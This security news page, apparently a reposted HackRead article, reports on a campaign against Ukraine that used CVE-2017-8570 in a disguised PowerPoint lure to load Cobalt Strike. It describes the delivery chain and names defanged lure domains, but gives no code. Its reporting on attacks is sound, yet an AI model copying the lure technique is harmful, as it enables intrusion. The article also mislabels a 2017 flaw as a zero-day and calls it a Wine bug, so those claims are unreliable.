Security
Headlines
HeadlinesLatestCVEs

Headline

7-Year-Old 0-Day in Microsoft Office Exploited to Drop Cobalt Strike

By Deeba Ahmed Hackers are dusting off old tricks! A recent attack exploited vulnerabilities in systems running outdates Microsoft Office to deliver Cobalt Strike malware. Learn how to protect yourself! This is a post from HackRead.com Read the original post: 7-Year-Old 0-Day in Microsoft Office Exploited to Drop Cobalt Strike

HackRead
#vulnerability#mac#windows#microsoft#linux#nodejs#git#zero_day

Cybersecurity firm Deep Instinct has discovered that attackers are using the Cobalt Strike loader to deploy old zero-day exploits, a relatively new trend. Let’s delve deeper into this.

Deep Instinct Threat Lab has discovered a targeted operation against Ukraine in which hackers are using an old zero-day vulnerability, CVE-2017-8570, as the initial vector and a custom loader for Cobalt Strike Beacon, a professional pen-testing tool designed for evaluating computer security by red teams. However, in this attack, hackers have used a cracked version with no legitimate user.

They’ve exploited CVE-2017-8570, an old Microsoft Office vulnerability identified in 2017, to launch the Cobalt Strike Beacon, targeting Ukraine’s systems. They used a malicious PPSX (PowerPoint Slideshow) file disguised as an old US Army instruction manual for mine-clearing tank blades, bypassing traditional security measures and allowing them to hide the payload and complicate analysis. The file used a “script:” prefix before the HTTPS URL to hide the payload and complicate analysis.

“The lure contained military-related content, suggesting it was targeting military personnel. But the domain names weavesilk(.)space and petapixel(.)fun are disguised as an obscure generative art site (weavesilk(.)com) and a popular photography site (petapixel(.)com). These are unrelated, and it’s a bit puzzling why an attacker would use these specifically to fool military personnel.”

Deep Instinct

The use of the Cobalt Strike loader, a malicious, versatile toolset commonly employed in targeted attacks, suggests a sophisticated approach by the attackers. Cobalt Strike allows adversaries to deploy malware, steal data, and maintain persistence on compromised systems. In the context of Ukraine, it is used as a delivery mechanism for these zero-day exploits, maximizing their impact.

Deep Instinct’s research indicates that attackers are actively leveraging zero-day exploits, which are vulnerabilities unknown to security software vendors. This makes them particularly dangerous as traditional defences may not be able to detect and block them.

Researchers couldn’t attribute the attacks to any known threat actor or rule out the possibility of a red team exercise. Evidence indicates the sample was uploaded from Ukraine, the second stage was hosted under a Russian VPS provider, and the Cobalt beacon C&C was registered in Warsaw, Poland.

Given the n-day exploitation trends against > 12-month-old edge device and email server CVEs we’ve seen over the past 4 years, seeing a threat actor exploit a Wine vulnerability from 2017 is weirdly refreshing, stated Casey Ellis, Founder and Chief Strategy Officer at Bugcrowd

The use of undocumented low-level WinAPI calls is unusual as well. I can understand why threat analysts are having difficulty with attribution, it’s an esoteric and somewhat nerdy kill chain. Casey explained.

“Aside from the technical pieces, the fact that it’s not Russia is noteworthy, and the TTPs suggest a previously unknown player. Cobalt Strike usage as a C2 is fairly commonplace and the key takeaway here is that old vulnerabilities in easily forgotten software still matter.

How to Stay Safe?

Deep Instinct’s research suggests that traditional security solutions may not be enough for zero-day exploits. Organizations should adopt advanced threat detection through behavioural analysis and machine learning. Vigilance is also crucial, especially for cyber threats targeting Ukraine, and a proactive defence strategy combining firewalls and antivirus software.

  1. APTs Exploiting WinRAR 0day Flaw Despite Patch Availability
  2. 5 year old vulnerability used for Monero mining on Linux servers
  3. Protestware Uses npm Packages to Call for Peace in Gaza, Ukraine
  4. 12-Year-Old vulnerability in Windows Defender risked 1 billion devices
  5. 17-year-old “wormable” SigRed vulnerability found in Windows servers

Related news

Military Tank Manual, 2017 Zero-Day Anchor Latest Ukraine Cyberattack

The targeted operation utilized CVE-2017-8570 as the initial vector and employed a notable custom loader for Cobalt Strike, yet attribution to any known threat actor remains elusive.

September 2023: VM courses, Bahasa Indonesia, Russian Podcasts, Goodbye Tinkoff, MS Patch Tuesday, Qualys TOP 20, Linux, Forrester, GigaOm, R-Vision VM

Hello everyone! On the last day of September, I decided to record another retrospective episode on how my Vulnerability Management month went. Alternative video link (for Russia): https://vk.com/video-149273431_456239136 September was quite a busy month for me. Vulnerability Management courses I participated in two educational activities. The first one is an on-line cyber security course for […]

Cybercrime Group TA558 Targeting Hospitality, Hotel, and Travel Organizations

A financially motivated cybercrime group has been linked to an ongoing wave of attacks aimed at hospitality, hotel, and travel organizations in Latin America with the goal of installing malware on compromised systems. Enterprise security firm Proofpoint, which is tracking the group under the name TA558 dating all the way back to April 2018, called it a "small crime threat actor." "Since 2018,

Microsoft Office Most Exploited Software in Malware Attacks – Report

By Deeba Ahmed Research reveals that around 80% of all malware attacks used MS Office flaws. Atlas VPN has shared its… This is a post from HackRead.com Read the original post: Microsoft Office Most Exploited Software in Malware Attacks – Report